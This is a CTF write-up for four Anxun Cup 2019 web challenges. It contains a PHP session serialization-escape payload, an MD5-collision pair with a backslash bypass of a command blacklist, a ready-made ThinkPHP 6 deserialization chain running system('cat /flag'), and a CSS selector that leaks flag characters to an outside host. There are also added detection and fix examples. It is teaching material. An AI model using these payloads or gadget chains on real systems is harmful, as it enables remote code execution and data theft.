安洵杯 2019 (Anxun Cup 2019)

[安洵杯 2019]easy_serialize_php

```php
<?php

$function = @$_GET['f'];

// Blacklist; note below that it is applied to the *serialized* session string.
function filter($img){
    $filter_arr = array('php','flag','php5','php4','fl1g');
    $filter = '/'.implode('|',$filter_arr).'/i';
    return preg_replace($filter,'',$img);
}


if($_SESSION){
    unset($_SESSION);
}

$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;

// Turns every POST field into a variable, so a POST key of _SESSION[...] overwrites $_SESSION.
extract($_POST);

if(!$function){
    echo '<a href="index.php?f=highlight_file">source_code</a>';
}

if(!$_GET['img_path']){
    $_SESSION['img'] = base64_encode('guest_img.png');
}else{
    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}

// Filtering after serialize() changes string contents without updating the s:N length fields.
$serialize_info = filter(serialize($_SESSION));

if($function == 'highlight_file'){
    highlight_file('index.php');
}else if($function == 'phpinfo'){
    eval('phpinfo();'); //maybe you can find something in here!
}else if($function == 'show_image'){
    $userinfo = unserialize($serialize_info);
    echo file_get_contents(base64_decode($userinfo['img']));
}
```

A quick look at phpinfo() shows: auto_append_file: d0g3_f1ag.php

So clearly we need to read that file. The way to do it is to control $_SESSION['img'] = 'ZDBnM19mMWFnLnBocA==' (the base64 of d0g3_f1ag.php).

At first glance this is a deserialization hole with no room to exploit, but the presence of extract($_POST); lets us overwrite $_SESSION.

The rest is simple: a string-shrinking escape. The filter removes characters from the serialized string, so the declared string lengths no longer match the data that follows them.

```php
<?php
// Same filter as the challenge.
function filter($img){
    $filter_arr = array('php','flag','php5','php4','fl1g');
    $filter = '/'.implode('|',$filter_arr).'/i';
    return preg_replace($filter,'',$img);
}
// 'user' loses 5*4 + 3 = 23 characters to the filter, exactly the length of ";s:8:"function";s:66:"
$_SESSION['user'] = 'flagflagflagflagflagphp';
$_SESSION['function'] ='";s:8:"function";s:3:"aaa";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}';
$_SESSION['img']='ZDBnM19mMWFnLnBocA==';
$serialize_info = filter(serialize($_SESSION));
echo $serialize_info;
$a = unserialize($serialize_info);
var_dump($a);
?>
```

I wrote this exp mainly to see which characters we need to escape, which makes assigning the values easier.

Payload:

```
GET: ?f=show_image

POST body:
_SESSION[user]=flagflagflagflagflagphp
&_SESSION[function]=";s:8:"function";s:3:"aaa";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}
```

Note especially that there is no $ here: the POST key is _SESSION[user], because extract() turns each key into a variable name. Then we get the flag!
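To make the length mismatch explicit and show the fix, here is an added Python model of the challenge (not code from the writeup): a minimal PHP-compatible serialize/unserialize for the $_SESSION shape, the same filter, and a safe_serialize that filters the values before serializing. The session contents are the writeup's payload, constructed inline.

```python
import re
# The challenge's blacklist, applied (as in the challenge) to the serialized blob.
FILTER = re.compile(r'php|flag|php5|php4|fl1g', re.I)

def php_filter(s: str) -> str:
    return FILTER.sub('', s)

def php_serialize(arr: dict) -> str:
    """Minimal PHP serialize() for a string=>string array (the $_SESSION shape here)."""
    body = ''.join(f's:{len(k)}:"{k}";s:{len(v)}:"{v}";' for k, v in arr.items())
    return f'a:{len(arr)}:{{{body}}}'

def php_unserialize(blob: str) -> dict:
    """Minimal unserialize() for that shape; like PHP it trusts the declared s:N length."""
    pos = 0
    def read_str() -> str:
        nonlocal pos
        m = re.match(r's:(\d+):"', blob[pos:])
        n, pos = int(m.group(1)), pos + m.end()
        val, pos = blob[pos:pos + n], pos + n
        if blob[pos:pos + 2] != '";':
            raise ValueError('declared length does not match data')
        pos += 2
        return val
    m = re.match(r'a:(\d+):\{', blob)
    pos = m.end()
    out = {}
    for _ in range(int(m.group(1))):  # trailing bytes after '}' are ignored, as in PHP
        key = read_str()
        out[key] = read_str()
    return out

def safe_serialize(arr: dict) -> str:
    """Fix: filter the values first, then serialize, so every length stays consistent."""
    return php_serialize({k: php_filter(v) for k, v in arr.items()})

# Constructed $_SESSION as extract($_POST) leaves it with the writeup's payload.
SESSION = {
    'user': 'flagflagflagflagflagphp',  # 5*4 + 3 = 23 chars, all removed by the filter
    'function': '";s:8:"function";s:3:"aaa";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}',
    'img': 'Z3Vlc3RfaW1nLnBuZw==',  # base64('guest_img.png'), what the app sets itself
}

def vulnerable_img() -> str:
    # filter() after serialize(): "user" shrinks to 0 chars but still claims 23, so the
    # parser swallows the next 23 bytes and the injected tail supplies the "img" value.
    return php_unserialize(php_filter(php_serialize(SESSION)))['img']

def fixed_img() -> str:
    return php_unserialize(safe_serialize(SESSION))['img']
```

With the fix the injected text survives only as the literal value of 'function' and 'img' stays the guest image.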

[安洵杯 2019]easy_web

What on earth? It is easy to spot an arbitrary file read here. I was a bit speechless: after decoding base64 twice I assumed the result was an md5, but md5 is 32 characters and this clearly isn't; decoding once more showed it is hex.

So first read the source, index.php:

```php
<?php
error_reporting(E_ALL || ~ E_NOTICE);
header('content-type:text/html;charset=utf-8');
$cmd = $_GET['cmd'];
if (!isset($_GET['img']) || !isset($_GET['cmd'])) 
    header('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=');
// img = base64(base64(hex(filename)))
$file = hex2bin(base64_decode(base64_decode($_GET['img'])));

$file = preg_replace("/[^a-zA-Z0-9.]+/", "", $file);
if (preg_match("/flag/i", $file)) {
    echo '<img src ="./ctf3.jpeg">';
    die("xixi~ no flag");
} else {
    $txt = base64_encode(file_get_contents($file));
    echo "<img src='data:image/gif;base64," . $txt . "'></img>";
    echo "<br>";
}
echo $cmd;
echo "<br>";
if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {
    echo("forbid ~");
    echo "<br>";
} else {
    // Strict comparison on the raw strings, but only the md5 digests need to match.
    if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {
        echo `$cmd`;
    } else {
        echo ("md5 is funny ~");
    }
}

?>
```
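Decoding the img parameter is also what a defender wants when reviewing access logs for this endpoint. The following is an added Python example (not from the writeup): it undoes the base64/base64/hex chain, then runs over constructed log lines and reports every request whose img does not name a plain image; the default value from the redirect and a request for index.php are used as the sample.

```python
import base64
import binascii
import re
from urllib.parse import parse_qs, urlsplit

def decode_img(param: str) -> str:
    """Undo the challenge's chain: img = base64(base64(hex(filename))).
    PHP's base64_decode() tolerates missing '=' padding (the default value has none);
    Python's does not, so pad before each decode."""
    def b64(s: bytes) -> bytes:
        return base64.b64decode(s + b'=' * (-len(s) % 4))
    return binascii.unhexlify(b64(b64(param.encode()))).decode('latin-1')

def encode_img(filename: str) -> str:
    """Inverse of decode_img, used only to build the constructed log lines below."""
    return base64.b64encode(base64.b64encode(binascii.hexlify(filename.encode()))).decode()

# Constructed access-log lines (not from the writeup). The first carries the default
# img value that index.php redirects to; the second requests the script's own source.
LOG_LINES = [
    '10.0.0.5 - - [01/Jan/2020:10:00:00 +0000] "GET /index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd= HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2020:10:00:07 +0000] "GET /index.php?img=' + encode_img('index.php') + '&cmd= HTTP/1.1" 200 2048',
]

# What a legitimate img value should decode to after the script's own [^a-zA-Z0-9.] strip.
ALLOWED = re.compile(r'^[A-Za-z0-9]+\.(png|jpe?g|gif)$')

def suspicious_requests(lines):
    """Return (client, decoded_img) for every request whose img is not a plain image name."""
    hits = []
    for line in lines:
        m = re.search(r'^(\S+) .*"GET (\S+) ', line)
        if not m:
            continue
        for img in parse_qs(urlsplit(m.group(2)).query).get('img', []):
            try:
                name = decode_img(img)
            except (binascii.Error, ValueError):
                name = '<undecodable>'
            if not ALLOWED.match(name):
                hits.append((m.group(1), name))
    return hits
```

The default value decodes to 555.png, which is why the page normally renders an image.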

For the md5 strict comparison, use this known collision pair (URL-encoded):

```
a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2
&b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2
```

Although so much is filtered, a backslash is enough: cmd=ta\c /flag returns the flag.

[安洵杯 2019]iamthinking

A ThinkPHP 6 deserialization vulnerability. I'm not very familiar with it, so I just used a ready-made payload:

```php
<?php
 
namespace think\model\concern;
 
trait Attribute
{
    // $withAttr maps the "key"/"key1" attribute to a callable; $data supplies its argument.
    private $data = ["key" => ["key1" => "cat /flag"]];
    private $withAttr = ["key"=>["key1"=>"system"]];
    protected $json = ["key"];
}
namespace think;
 
abstract class Model
{
    use model\concern\Attribute;
    private $lazySave;
    protected $withEvent;
    private $exists;
    private $force;
    protected $table;
    protected $jsonAssoc;
    function __construct($obj = '')
    {
        $this->lazySave = true;
        $this->withEvent = false;
        $this->exists = true;
        $this->force = true;
        $this->table = $obj;
        $this->jsonAssoc = true;
    }
}
 
namespace think\model;
 
use think\Model;
 
class Pivot extends Model
{
}
$a = new Pivot();
$b = new Pivot($a);
$c = array($b);
echo urlencode(serialize($c));
```

/public/?payload=

Pass the URL-encoded output as that parameter and it's done.

[安洵杯 2019]cssgame

I couldn't get this one working; it needs some things set up. I had configured an intranet mapping for reverse shells before, but it doesn't work now, which is frustrating!

The knowledge point tested is CSS injection; the principle is to use CSS selectors:

```css
input[name=flag][value^="f"] ~ * {background-image: url("http://x.x.x.x/?flag=f");}
```

First find the input element whose name is flag; if its value starts with f, the browser requests the URL that follows, so we can brute-force it character by character, mainly by mapping each value^="..." guess to its own URL. But the challenge box has no outbound network, so you need an intranet mapping and then a small Python web server... which I couldn't manage! If any master knows how, please teach me!
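From the defender's side the tell-tale pattern is a rule that combines an attribute prefix/suffix/substring probe on an input with a url() pointing off-site. The following is an added Python check (not from the writeup) that scans a stylesheet for such rules; the sample stylesheet is constructed and includes the selector above.

```python
import re
from urllib.parse import urlsplit

# A CSS exfiltration rule pairs an attribute prefix/suffix/substring selector
# ([value^=...], [value$=...], [value*=...]) with a declaration that fetches an
# external URL, so the browser itself reports which guess matched.
RULE = re.compile(r'([^{}]+)\{([^{}]*)\}', re.S)
ATTR_PROBE = re.compile(r'\[\s*value\s*[\^$*]=', re.I)
URL = re.compile(r'url\(\s*["\']?([^"\')\s]+)', re.I)

def css_exfil_rules(stylesheet: str, own_hosts=('localhost',)):
    """Return (selector, url) for each rule that probes an input value and loads a URL
    from a host outside own_hosts; same-origin url() calls (no host) are ignored."""
    hits = []
    for selector, body in RULE.findall(stylesheet):
        if not ATTR_PROBE.search(selector):
            continue
        for target in URL.findall(body):
            host = urlsplit(target).hostname
            if host and host not in own_hosts:
                hits.append((selector.strip(), target))
    return hits

# Constructed stylesheet: one harmless rule plus the writeup's probe selector.
SAMPLE_CSS = '''
body { background-image: url("/static/bg.png"); }
input[name=flag][value^="f"] ~ * {background-image: url("http://x.x.x.x/?flag=f");}
'''
```

The matching mitigation is a Content-Security-Policy whose img-src (and style-src, if user CSS is reflected) is limited to the site's own origin, so the probe's request never leaves the page.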
